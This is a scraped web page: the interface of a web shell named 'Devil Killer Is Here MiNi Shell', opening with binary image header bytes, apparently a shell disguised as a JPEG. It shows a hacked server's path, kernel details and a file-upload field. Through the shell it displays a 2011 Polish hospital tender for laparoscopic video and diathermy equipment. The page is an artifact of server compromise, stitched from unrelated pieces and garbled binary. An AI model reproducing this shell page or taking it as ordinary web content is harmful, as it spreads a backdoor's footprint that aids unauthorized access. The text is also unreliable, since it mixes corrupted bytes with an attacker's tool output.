JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110120/23731-N-2011.html

<p class="kh_header"><b>Toruń: Dostawa toru wizyjnego do laparoskopii wraz z systemem archiwizacji danych
i diatermii z systemem zamykania naczyń</b><br>
<b>Numer ogłoszenia: 23731 - 2011; data zamieszczenia: 20.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Zespolony im. L. Rydygiera , ul. Św. Józefa 53/59, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 056 6101510, faks 056 6596128.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zamow_publ.@szpital.szpital-bielany.torun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa toru wizyjnego do laparoskopii wraz z systemem archiwizacji danych
i diatermii z systemem zamykania naczyń.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest:
Zadanie Nr 1 - dostawa 1 szt. toru wizyjnego do laparoskopii wraz z systemem archiwizacji danych;<br>
I.
Optyka zintegrowana ze światłowodem, adapterem i głowicą dedykowana 	   
do zabiegów laparoskopowych przez jedno cięcie <br>	 
1. Kąt patrzenia: 30°<br> 

2. Pole widzenia: 70° <br>

3.
Długość robocza: 318 mm <br>

4.
Średnica zewnętrzna tulei wprowadzającej: 5,4 mm <br>

5.
Konstrukcja uchwytu optyki z możliwością zgięcia:  optymalny kąt zgięcia 70° <br>

6.
Przyciski funkcyjne na rękojeści: 3 <br>

7.
Sterylizacja: w autoklawie <br>

II.
Tor wizyjny pracujący w systemie HDTV<br>
1.
Procesor <br>	

1.1.
Systemy telewizyjne, w których musi pracować procesor: HDTV 1080i, PAL <br>

1.2.
Ilość linii obrazu skanowanych efektywnie:	1080 linii<br>

1.3.
Możliwość ustawienia parametrów pracy kamery dla różnych specjalności lub użytkowników<br>

1.4.
Wyjścia analogowe: RGB, BNC, S-VHS <br>

1.5.
Wyjścia cyfrowe: HDSDI, SDI, Firewire <br>

1.6.
Współpraca z wideolaparoskopami z kamerą wbudowaną w końcówkę videolaparoskopu oraz standardowymi głowicami laparoskopowymi 1-no i 3-chipowymi<br>

1.7.
Klawiatura z możliwością edycji danych na monitorze oraz kontroli funkcji oraz menu kamery<br>

1.8.
Automatyczne sterowanie intensywnością oświetlenia <br>

1.9.
Zoom cyfrowy <br>

1.10.
Możliwość przypisania różnych funkcji do każdego przycisku sterującego na głowicy kamery, wideolaparoskopu lub wideoendoskopu dla rożnych użytkowników lub specjalności<br>

1.11.
Wyposażony w moduł komunikacyjny umożliwiający komunikację urządzenia z centralnym systemem sterowania urządzeniami laparoskopowymi bloku operacyjnego<br>

2.
Ksenonowe źródło światła<br> 

2.1.
Moc źródła światła: 300 W<br> 	

2.2.
Automatyczna regulacja jasności światła<br>

2.3.
Żarówka zapasowa w przypadku uszkodzenia lampy głównej <br>	

2.4.
Wyposażone w filtr optyczny blokujący pasmo czerwone w widmie światła białego<br>

2.5.
Wyposażone w moduł komunikacyjny umożliwiający komunikację urządzenia z centralnym systemem sterowania urządzeniami laparoskopowymi bloku operacyjnego<br> 

3.
Głowica kamery<br>

3.1.
Pracująca w systemie HDTV <br>

3.2.
Przyciski sterujące na głowicy kamery: 3<br>

3.3.
Zintegrowany adapter łączący optykę z głowicą z zamkiem zaciskowym<br>

4.
Optyka laparoskopowa w systemie HD - 1 szt.<br>

4.1.
Kąt patrzenia: 45°<br>

4.2.
Średnica zewnętrzna: 10mm<br>

4.3.
Długość robocza: 310 mm<br>

4.4
Kontener do sterylizacji<br>

5.
Optyka laparoskopowa w systemie HD - 2 szt.<br>

5.1.
Kąt patrzenia: 30°<br>

5.2.
Średnica zewnętrzna: 10mm<br>

5.3.
Długość robocza: 310 mm<br> 

5.4.
Kontener do sterylizacji<br>

6.
Światłowód - 4 szt.<br>

6.1.
Długość: 3m<br>

6.2.
Średnica zewnętrzna: 7mm <br>

6.3.
Średnica wiązki światłowodowej: 4,25 mm <br>	 

6.4.
Sterylizacja: autoklaw, 134°C, 5 minut <br>

7.
Monitor medyczny LCD - 2 szt.<br>

7.1.
Rozdzielczość ekranu: 1280 x 1024 pikseli <br>  

7.2.
Przekątna ekranu: 21cali <br> 	

7.3.
Sygnał we/wy: SVHS, PAL, RGB <br>	

7.4.
Pracujący w standardzie HDTV dostosowany do oferowanej kamery<br>

8.
Wózek - 1 szt.<br>

8.1.
Podstawa jezdna z blokadą kół<br>

8.2.
Listwa zasilająca z transformatorem separującym<br>

8.3.
Ramię ruchome do monitora pracujące w trzech płaszczyznach - 1 szt.<br>

8.4.
Możliwość ustawienia wszystkich elementów    
zestawu<br>	 

8.5.
Uchwyt na butlę CO2<br>

9.
Dodatkowe ramię na monitor - 1 szt.<br>	

9.1.
Pracujące w trzech płaszczyznach<br>

III.
Insuflator<br>

1.
Ciśnienie przepływu dwutlenku węgla: 0-25mmHg<br>

2.
Przepływ dwutlenku węgla: 35 l/min <br>

3.
Funkcja oddymiania: automatyczne oddymianie pola operacyjnego za pomocą drenu oddymiającego w czasie cięcia nożem harmonicznym 	 <br>

4.
Reakcja na przekroczenie zadanych parametrów: automatyczna desuflacja pacjenta po przekroczeniu zadanych parametrów<br>

5.
Informacja o przekroczeniu zadanego ciśnienia: alarm dźwiękowy i świetlny<br>

6.
Pobór CO2: praca z butlą lub centralnym systemem ściennym zasilania w CO2<br>

7.
Dodatkowe wyposażenie - rodzaje drenów: wyposażony w zestaw autoklawalnych 	niskociśnieniowych drenów do   insuflacji i oddymiania<br> 	   

8.
Dodatkowe wyposażenie - kabel wysokociśnieniowy: wyposażony w kabel wysokociśnieniowy do podłączenia butli CO2<br>

9.
Dodatkowe wyposażenie - rodzaje modułów: wyposażony w moduł komunikacyjny umożliwiający komunikację urządzenia z centralnym systemem/siecią urządzeń laparoskopowych bloku operacyjnego<br> 	 

IV.
Pompa płucząca<br>

1.
Parametry płukania:<br>
a) maksymalny przepływ: 0- 1,8 l/min <br>	   
b) ciśnienie: 400 mm Hg<br>

2.
Dodatkowe wyposażenie: <br>			   
a) dreny Y-kształtne, wielorazowego użytku         -5szt.<br>
b) uniwersalny uchwyt do sond ssąco-płuczących -2szt.<br>
c) sonda ssąco-płucząca z otworami na końcu dystalnym:<br>
        średnica 10mm,  długość robocza: 360 	        - 2 szt.<br>
d) sonda ssąco-płucząca z otworami na końcu dystalnym:<br>
        średnica 5,3mm, długość robocza: 360         - 2 szt.<br>

V.
Oprogramowanie dla stanowiska wideolaparoskopowego - system komputerowy do archiwizacji badań oraz obrazów laparoskopowych<br>
1.
Interfejs programu w języku polskim <br>

2.
Oprogramowanie oparte na profesjonalnej bazie danych: MS SQL<br>

3.
Możliwość konfiguracji poziomu dostępu każdego użytkownika<br> 

4.
Terminarz do prowadzenia zapisów badań <br>

5.
Pełna elektroniczna informacja o historii pacjenta z możliwością nagrania na nośnik CD/DVD<br>

6.
Wyszukiwanie pacjentów po polach: 
PESEL, Nazwisko, Imię, data ur., itp. <br>

7.
Rejestracja obrazów oraz sekwencji wideo sterowanych bezpośrednio z głowicy wideolaparoskopu w czasie rzeczywistym <br>

8.
Automatyczny transfer danych badania oraz pacjenta na monitor zestawu wideoendoskopowego <br>

9.
Edycja zdjęć oraz obróbka materiału wideo<br>

10.
Możliwość eksportowania oraz importowania zdjęć w znanych formatach: BMP, JPG, PNG <br>

11.
Możliwość eksportowania oraz importowania filmów w znanych formatach: AVI, MPG2<br>

12.
Możliwość nagrywania notatek głosowych <br>

13.
Zaznaczanie na schemacie anatomicznym miejsca zrobienia zdjęcia oraz pobrania wycinków <br>

14.
Kontrola ilości badań wykonanych przez personel oraz endoskop <br>

15.
Tworzenie raportów z badań w oparciu o bloki tekstowe z możliwością:<br> 
- edycji,
- tworzenia własnych terminologii w języku polskim
- wyborem zdjęć zarejestrowanych podczas badania.

16.
Możliwość eksportowania raportów w znanych formatach: PDF, TXT <br>

17.
Zestawienie statystyczne rodzajów badań, ilości schorzeń, liczenie kosztów badań, instytucji kierujących <br>

18.
Możliwość autoryzacji raportów badań poprzez kartę chipową zaprogramowaną w programie (opcja)<br>

19.
System dokumentacji Endo Base. Moduł pozwalający na integrację z serwerem HIS poprzez standard DICOM.<br>

20
System dokumentacji Endo Base, integracja z systemem CAPS poprzez protokół HL7.<br>

21
Współpraca z systemem komputerowym do archiwizacji badań oraz obrazów laparoskopowych.<br>

22
Stanowiska robocze z certyfikatem ISO zawierające monitor LCD, drukarkę, oprogramowanie MS Windows PL oraz licencje - 2 zestawy<br>

VI.
Pozostałe wyposażenie<br>
1.
Ruchome ramię do instalacji lamp, monitorów -2 szt.<br>

2. 
Narzędzia bipolarne: 
- kleszczyki chwytające typu Johann, bipolarne,      średnica 5 mm, długość 330 mm, długość ramion
końcówki chwytającej 16.5 mm, rączka bez zamka - 2szt. <br>

 3. 
Narzędzia laparoskopowe do zabiegów małoinwazyjnych: 
- szczypce chwytające typu Johann, osłona i wkład,  średnica 5mm długość 350 mm, podwójnie wygięte - 1szt.
- szczypce preparacyjne typu Maryland, osłona i wkład,         średnica 5mm długość 350 mm, podwójnie wygięte   - 1szt.  
- nożyczki typu Metzenbaum, osłona i wkład, 
średnica 5mm długość 350 mm, podwójnie wygięte   - 1szt. 
- uchwyt wielorazowy z przyłączem monopolarnym  - 2szt.        
- uchwyt wielorazowy z zamkiem dezaktywującym   - 1szt. <br>

VII.
Warunki dodatkowe gwarancji i serwisu<br>
1.
Wpis do rejestru wyrobów medycznych lub deklaracja zgodności CE<br>

2.
Okres gwarancji - min. 24 miesiące<br>

3.
Instrukcja obsługi i karta gwarancyjna w języku polskim<br>

4.
Czas reakcji serwisu - w ciągu 24 godzin licząc od momentu zgłoszenia awarii przez użytkownika<br>

5.
Gwarancja zapewnienia zakupu części zamiennych przez okres 10 lat<br>

6.
Bezpłatne szkolenie personelu obsługującego urządzenie<br>

7.
Bezpłatna instalacja urządzenia<br>

8.
Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji<br>

9.
Urządzenie zastępcze jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancyjnym)<br><br>

Zadanie Nr 2 - dostawa 1 szt. diatermii z systemem zamykania naczyń<br>

I.
PARAMETRY TECHNICZNE DIATERMII<br>
1.
Tryb bipolarny - moc max. 95W<br>

2.
Cięcie monopolarne, tryb czysty - moc max 300W<br>

3.
Cięcie monopolarne z hemostazą - moc max 200W<br>

4.
Tryb dynamicznego doboru stosunku napięcie (V)/prąd (A) w zależności od szybkości ruchu ręki operatora w czasie operacji - zwalniając cięcie uzyskuje się większą hemostazę koagulacje a przyspieszając uzyskuje się lepsze rozcinanie cięcie - moc max 200W<br>

5.
Koagulacja monopolarna - wyżarzanie - moc max 120 W<br>

6.
Koagulacja monopolarna - rozpylanie - moc max 120 W<br>

7.
System zamykania naczyń - moc max 350 W<br>

8.
Minimum trzy indywidualne wyświetlacze dotykowe LCD:  dwa dla pracy w systemie monopolarnym, jeden dla trybu bipolarnego, jeden dla systemu zamykania naczyń krwionośnych.<br>

9.
Waga do 1400g bez wózka i oprzyrządowania.<br>

10
Zróżnicowany sygnał dźwiękowy dla trybów alarmowych.<br>

11.
Menu w języku polskim.<br>

12.
Zróżnicowany sygnał dźwiękowy dla różnych trybów pracy.<br>

13.
Minimum: trzy gniazda urządzenia monopolarnego, jedno gniazdo urządzenia bipolarnego, dwa gniazda do systemu zamykania naczyń krwionośnych<br>

14.
Minimum: dwa gniazda sterowników nożnych: mono i bipolarny, dwa gniazda sterowników nożnych systemu zamykania naczyń krwionośnych, gniazda serwisowe, gniazdo sterowania ewakuatorem dymu.<br>

15.
Możliwość aktualizacji oprogramowania w urządzeniu przez użytkownika <br>

16.
Automatyczne rozpoznawanie końcówek roboczych przez generator.<br>

17.
Możliwość jednoczesnego podłączenia dwóch instrumentów do zamykania naczyń krwionośnych.<br>

18.
Kompatybilność i możliwość podłączenia kleszczyków systemu zamykania naczyń do zabiegów klasycznych o dł. od 16 do 18 cm.<br>

19.
Kompatybilność i możliwość podłączenia instrumentu laparoskopowego 5 mm z opcją cięcia i możliwością aktywacji z uchwytu lub włącznika nożnego.<br>

20.
Kompatybilność i możliwość podłączenia instrumentu laparoskopowego 10 mm z opcją cięcia i możliwością aktywacji z uchwytu lub włącznika nożnego.<br>


21.
Kompatybilność i możliwość podłączenia instrumentu do zabiegów klasycznych 10 mm z opcją cięcia i możliwością aktywacji z uchwytu lub włącznika nożnego.<br>

22.
Wizualizacja nastawianej mocy.<br>

23.
Urządzenie wyposażone w system zabezpieczenia pacjenta przed poparzeniem w polu przylegania płytki biernej.<br>

24.
Automatyczne przejście z furgulacji na spray w trybie dynamicznego doboru stosunku napięcie/prąd w zależności od właściwości anatomicznych tkanek tj. pomiaru jej impedancji<br>

25.
Automatyczny, adaptywny system bezpieczeństwa dla elektrody powrotnej w zakresie min 5-135Ohm<br>

26.
Funkcja autobipolar<br>

27.
Gniazda przyłączeniowe automatycznie rozpoznające podłączone narzędzie, wyświetlanie dedykowanego do obsługi narzędzia ekranu sterowniczego z zabezpieczeniem przed omyłkowym przejściem do nieodpowiednich funkcji generatora.<br>

28.
Ekrany aktywne podświetlane, ekran nieaktywny przyciemniony<br>

29.
Możliwość podłączenia uchwytu monopolarnego z możliwością pięciostopniowej regulacji mocy na rączce z aktywacją trybu cięcia, koagulacji<br>

II.
WYPOSAŻENIE DODATKOWE DIATERMII<br>
1
Ewakuator dymu elektrochirurgicznego, sześć poziomów siły ssania - 1 szt.<br>

2
Przewód łączący ewakuator dymu z generatorem elektrochirurgicznym, pozwalający na automatyczną aktywacje w czasie pracy, długość 3 m - 1 szt.<br>

3
Filtr do ewakuatora dymu - 2 szt.<br>

4
Włącznik nożny do aktywacji ewakuatora dymu - 1 szt.<br>

5
Dren podstawowy do ewakuatora dymu - 10 szt.<br>

6
Wózek montażowy ze stali kwasoodpornej, dla elektrokoagulacji z systemem zamykania naczyń, cztery półki, szuflada, uchwyty na przewody sieciowe, blokada dwóch kółek  - 1szt.<br>

7
Trzy przyciskowy włącznik nożny monopolarny do cięcia, koagulacji - pozwalającym uzyskać jednoczesne cięcie z koagulacją przy zachowaniu minimalnego  rozprzestrzenienia termicznego - 1 szt.<br>

8
Włącznik nożny do systemu zamykania naczyń, długość przewodu min. 4,5 m - 1 szt.<br>

9
Włącznik bipolarny, długość przewodu min. 4,5 m - 1 szt.<br>

10
Uchwyt monopolarny wielorazowy z elektrodą nożową, dwoma przyciskami cięcie i koagulacja, przełącznikiem kołyskowym, przewodem o dł. 4,6 m, złączem trójbolcowym kompatybilnym z oferowanym generatorem oraz elektrodami z typowym trzonkiem 2,4mm - 10szt.<br>

11
Elektroda powrotna dla pacjentów dorosłych z klejem elektroprzewodzącym oraz dzielonym stykiem szerokości 4cm, wyposażona w system kontroli jakości styku kompatybilny z oferowanym generatorem oraz z żelem zapewniającym prawidłowe przyleganie do skóry pacjenta, powierzchnia min. 150cm2 - 200 szt.<br>

12
Przewód elektrody powrotnej pacjenta z klipsem o szerokości styku 4 cm, długość przewodu 4,6 m, kompatybilny z oferowanym generatorem - 2 szt.<br>

13
Przewód do endoskopowych narzędzi monopoloarnych, współpracujący z 4 mm złączem męskim, długość min. 3,0 m (sterylizacja parowa) - 3 szt.<br>

14
Laparoskopowe narzędzie do uszczelniania i rozdzielania naczyń i pęczków tkankowych, długość 37 cm, średnica trzonu 10 mm, aktywowany ręcznie lub nożnie, z wbudowanym nożem, z przewodem, obracanym trzonem, kompatybilny z oferowanym generatorem - 2 szt.<br>

15
Narzędzie do uszczelniania i rozdzielania naczyń i pęczków tkankowych, długość 20 cm, średnica trzonu 10 mm, aktywowany ręcznie lub nożnie, z wbudowanym nożem, z przewodem, obracanym trzonem, kompatybilne z oferowanym generatorem - 3 szt.<br>

16
Precyzyjne kleszczyki do uszczelniania naczyń i pęczków tkankowych, długość elektrody 20 mm, wygięcie szczęk 15 st., długość 17 cm, z przewodem, kompatybilny z systemem zamykania naczyń do 7 mm włącznie - 6 szt.<br>

 17
Pinceta bipolarna, długość całkowita 15,2 cm, zakończenie 0,7mm - 1 szt.<br>

18
Przewód do pincety z włącznikiem nożnym, wtyk odlewany - 1 szt.<br>

III.
 WARUNKI GWARANCJI I SERWISU<br>

1.
Wpis do rejestru wyrobów medycznych lub deklaracja zgodności CE<br>

2.
Okres gwarancji - min 24 miesiące <br>

3.
Instrukcja obsługi i karta gwarancyjna w języku polskim<br> 

4.
Czas reakcji serwisu - max 24 godzin od zgłoszenia awarii przez użytkownika<br>  

5.
Gwarancja zapewnienia zakupu części zamiennych przez okres 10 lat.<br>

6.
Diatermia zastępcza jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancji)<br>

7.
Bezpośrednie szkolenie personelu obsługującego urządzenie<br>  

8.
Bezpłatna instalacja urządzenia.<br>

9.
Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji.<br>.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełniania warunku posiadania uprawnień do wykonywania określonej działalności lub czynności Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a/ wykaz wykonanych min. 2 dostaw urządzeń medycznych o wartości minimalnej dla poszczególnych zadań:
      - dla zadania nr 1 -      259.500,00 zł
      - dla zadania nr 2 -        59.500,00 zł
	brutto każda dostawa w okresie ostatnich trzech lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia min. 2 dokumentów potwierdzających, że te dostawy zostały wykonane należycie;

Wykonawca składający ofertę na Zadanie Nr 1 i Nr 2 musi wykazać się zrealizowanymi 
2 dostawami o wymaganej wartości łącznej równej sumie tych zadań, tj. 255.200,00 zł każda dostawa.

Jeżeli Wykonawca wykazując spełnianie tego warunku polegać będzie na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2 b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda przedstawienia w odniesieniu do tych podmiotów dokumentów stwierdzających, że do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 pkt 2 ustawy - Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełniania warunku dysponowania odpowiednim potencjałem technicznym Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>/		informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy do min. kwoty: 
	- dla zadania nr 1 -    415.200,00 zł
      - dla zadania nr 2 -      95.200,00 zł
	wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
      	/Informacja banku mówiąca tylko o obrotach na rachunku Wykonawcy nie spełni warunku        udziału/
	Wykonawca składający ofertę na kilka zadań musi załączyć do oferty informację banku lub spółdzielczej kasy oszczędnościowo- kredytowej o wymaganej wartości łącznej równej sumie poszczególnych zadań, których dotyczy oferta.
       Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2 b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
     
 Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

